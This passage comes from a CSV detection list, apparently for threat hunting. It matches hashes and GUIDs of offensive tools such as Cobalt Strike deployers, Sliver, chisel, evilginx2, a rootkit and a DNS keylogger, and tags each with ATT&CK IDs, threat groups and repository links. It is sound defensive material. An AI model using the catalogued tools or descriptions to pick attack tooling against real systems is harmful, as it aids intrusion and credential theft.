to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*913d774e5cf0bfad4adfa900997f7a1a*",".{0,1000}913d774e5cf0bfad4adfa900997f7a1a.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*91474981006a8437b1f628985dfc79c56dac4cb73dbcbebed1c01211149aef81*",".{0,1000}91474981006a8437b1f628985dfc79c56dac4cb73dbcbebed1c01211149aef81.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*91502e94bd83b8803e91d20d1b231c112d65561f588b92e888982f7753374e8d*",".{0,1000}91502e94bd83b8803e91d20d1b231c112d65561f588b92e888982f7753374e8d.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - 
T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*9183fb7b9d4dc2bae17ce77d1069811f767fe88d17944c9cb81120af0c239faf*",".{0,1000}9183fb7b9d4dc2bae17ce77d1069811f767fe88d17944c9cb81120af0c239faf.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*9188fe2a96fbb147f85f455cb4edad4f21878e269f032556da95e8d0a9889f93*",".{0,1000}9188fe2a96fbb147f85f455cb4edad4f21878e269f032556da95e8d0a9889f93.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*919282a2110d48cdca526f1638e723c84c3f3a3d85525488887b065b476b3887*",".{0,1000}919282a2110d48cdca526f1638e723c84c3f3a3d85525488887b065b476b3887.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*91ae5ce613fa82b7764401fb12fb8977a0b3c78325faa16f30abeb3dfbe9c71a*",".{0,1000}91ae5ce613fa82b7764401fb12fb8977a0b3c78325faa16f30abeb3dfbe9c71a.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","https://www.virustotal.com/gui/file/91ae5ce613fa82b7764401fb12fb8977a0b3c78325faa16f30abeb3dfbe9c71a","10","10","N/A","N/A","N/A","N/A" "*91B12706-DC6A-45DE-97F1-FAF0901FF6AF*",".{0,1000}91B12706\-DC6A\-45DE\-97F1\-FAF0901FF6AF.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*91b1c7537e69ff7ade05c1c3a6051c2981a022a11b71c6e355891e294574a066*",".{0,1000}91b1c7537e69ff7ade05c1c3a6051c2981a022a11b71c6e355891e294574a066.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*91EA50CD-E8DF-4EDF-A765-75354643BD0D*",".{0,1000}91EA50CD\-E8DF\-4EDF\-A765\-75354643BD0D.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*91ec53f564ad02117b9d7e868c449265e99b4b7443d3a83ffe55b3b49d5be279*",".{0,1000}91ec53f564ad02117b9d7e868c449265e99b4b7443d3a83ffe55b3b49d5be279.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*920021c608185f95a4100ebec9e7c0fb4c67c1d192257ba9ac3430b2939762a3*",".{0,1000}920021c608185f95a4100ebec9e7c0fb4c67c1d192257ba9ac3430b2939762a3.{0,1000}","offensive_tool_keyword","DNS-Tunnel-Keylogger","Keylogging server and client that uses DNS tunneling/exfiltration to transmit keystrokes","T1056.001 - T1048.003","TA0009 - TA0011","N/A","N/A","Collection","https://github.com/Geeoon/DNS-Tunnel-Keylogger","1","0","N/A","9","2","196","31","2024-04-13T13:58:04Z","2024-01-10T17:25:58Z" "*920c719a1e1d8509b4f2a46062887ad5d09cc53ef907cb3c58140a9eefe6522d*",".{0,1000}920c719a1e1d8509b4f2a46062887ad5d09cc53ef907cb3c58140a9eefe6522d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*920e37529214d87fb835861d8c539e5c70d9d98fb0f48ad097760f298aee30d3*",".{0,1000}920e37529214d87fb835861d8c539e5c70d9d98fb0f48ad097760f298aee30d3.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*921157808497e5fe57f27fdb490be391f0f28bacffdb8cb9ed233bc3929b85a3*",".{0,1000}921157808497e5fe57f27fdb490be391f0f28bacffdb8cb9ed233bc3929b85a3.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*922b54e9d685b1bdd4d04f7b34c9f42b5f99745325a65f3147c719108d7e01c5*",".{0,1000}922b54e9d685b1bdd4d04f7b34c9f42b5f99745325a65f3147c719108d7e01c5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9250bff8ddad6b9cd10ef94589c2fb82e97a12772856e92af4ff26adfbc3021c*",".{0,1000}9250bff8ddad6b9cd10ef94589c2fb82e97a12772856e92af4ff26adfbc3021c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*927c3728901bdfa38cd1ec9e7ca972923b1cc51d7159e0d25e2c063e6d2a2f60*",".{0,1000}927c3728901bdfa38cd1ec9e7ca972923b1cc51d7159e0d25e2c063e6d2a2f60.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with 
reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*92804faaab2175dc501d73e814663058c78c0a042675a8937266357bcfb96c50*",".{0,1000}92804faaab2175dc501d73e814663058c78c0a042675a8937266357bcfb96c50.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "*928097a924168caad66fead2633e4d44e4f585e0d33d05deb50b9c2d34cda246*",".{0,1000}928097a924168caad66fead2633e4d44e4f585e0d33d05deb50b9c2d34cda246.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*929dbe39814a7b4acba0efe0a552840aeb1e9a5b1f8045be633e6fb68f4e2155*",".{0,1000}929dbe39814a7b4acba0efe0a552840aeb1e9a5b1f8045be633e6fb68f4e2155.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*92bc6c12e5ead3c0c0069b53bcca9c2f21b9f2e10f1e4a05ef1efcd25bcc70e9*",".{0,1000}92bc6c12e5ead3c0c0069b53bcca9c2f21b9f2e10f1e4a05ef1efcd25bcc70e9.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege 
Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*92c2dcbc529e4f81c4bc9aedfabc4361314ab0799a3fa56bc14750933cf207a3*",".{0,1000}92c2dcbc529e4f81c4bc9aedfabc4361314ab0799a3fa56bc14750933cf207a3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*92f28921ca0db8a0c7c1a4e18a9e9dea53fdbd902b3d3ad67444f59a21a96d5c*",".{0,1000}92f28921ca0db8a0c7c1a4e18a9e9dea53fdbd902b3d3ad67444f59a21a96d5c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*932e9575f1cda389162af613cfad2ec48f9fedd7039e09aec2b349ca2a9f663e*",".{0,1000}932e9575f1cda389162af613cfad2ec48f9fedd7039e09aec2b349ca2a9f663e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*933a32bee8a72a28653b56cb9b013f67da6510d4ad10c21333a6e930d385fb82*",".{0,1000}933a32bee8a72a28653b56cb9b013f67da6510d4ad10c21333a6e930d385fb82.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*934cdd2196c8892b2587ae94b5ae02e3c51ebf73c4c91b43b081d8add9ea381a*",".{0,1000}934cdd2196c8892b2587ae94b5ae02e3c51ebf73c4c91b43b081d8add9ea381a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*93642234b0a16f0af2ebc99eb13287ab9b518bc5784358ee7d8166d3ae254560*",".{0,1000}93642234b0a16f0af2ebc99eb13287ab9b518bc5784358ee7d8166d3ae254560.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9372fc352f24f6f58fe28bd7d0ff4cdc3a384275c7ddd6f76c4fa40eea0a94b2*",".{0,1000}9372fc352f24f6f58fe28bd7d0ff4cdc3a384275c7ddd6f76c4fa40eea0a94b2.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*9381458c6722bf9307b870bfe07388ed787f229e93d971287883d8d8e490bfff*",".{0,1000}9381458c6722bf9307b870bfe07388ed787f229e93d971287883d8d8e490bfff.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9399f2fe7c63989641f911a519930e9139ff4987c0bdaee56c25d68c4c64a63b*",".{0,1000}9399f2fe7c63989641f911a519930e9139ff4987c0bdaee56c25d68c4c64a63b.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*93b20a7961c9986baf181d1a1635b33b87735f75d046c6dcdd5d412a55832d6f*",".{0,1000}93b20a7961c9986baf181d1a1635b33b87735f75d046c6dcdd5d412a55832d6f.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. 
Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*93bd4c92a4470333efab88a00bfec4c3fc64318fc8ce0ffb9187ea54a9acf243*",".{0,1000}93bd4c92a4470333efab88a00bfec4c3fc64318fc8ce0ffb9187ea54a9acf243.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*93c574a4f1608cb5ecf7173e42d35c5a670c58c635e6a90252cd9a102d24e260*",".{0,1000}93c574a4f1608cb5ecf7173e42d35c5a670c58c635e6a90252cd9a102d24e260.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*93d1405dfa8765ab3ec43d1912e65ae89b8b8d06ddbc570f8cae0ca46dbf5007*",".{0,1000}93d1405dfa8765ab3ec43d1912e65ae89b8b8d06ddbc570f8cae0ca46dbf5007.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*93e193e3081c5ac744e40c81c32992ef449c855752d8b10f6483a969950572a4*",".{0,1000}93e193e3081c5ac744e40c81c32992ef449c855752d8b10f6483a969950572a4.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*93f5019c2c7b3a946f3a137fa1754576400c126f24b424076c9801e8f67441fd*",".{0,1000}93f5019c2c7b3a946f3a137fa1754576400c126f24b424076c9801e8f67441fd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
"*940B1177-2B8C-48A2-A8E7-BF4E8E80C60F*",".{0,1000}940B1177\-2B8C\-48A2\-A8E7\-BF4E8E80C60F.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*9421b13f1c89ded77d1964b6e7032e300360063fc9d79b4afd432533038725d4*",".{0,1000}9421b13f1c89ded77d1964b6e7032e300360063fc9d79b4afd432533038725d4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9440cc0475d27f1b73944b69fc843ef2ef2e8fc407d1400502c49ee20291121b*",".{0,1000}9440cc0475d27f1b73944b69fc843ef2ef2e8fc407d1400502c49ee20291121b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*945efb5ef7d46cf1e4f5383fb158ea5cd63d42214ea44abd73592f6ceeb6cf33*",".{0,1000}945efb5ef7d46cf1e4f5383fb158ea5cd63d42214ea44abd73592f6ceeb6cf33.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" 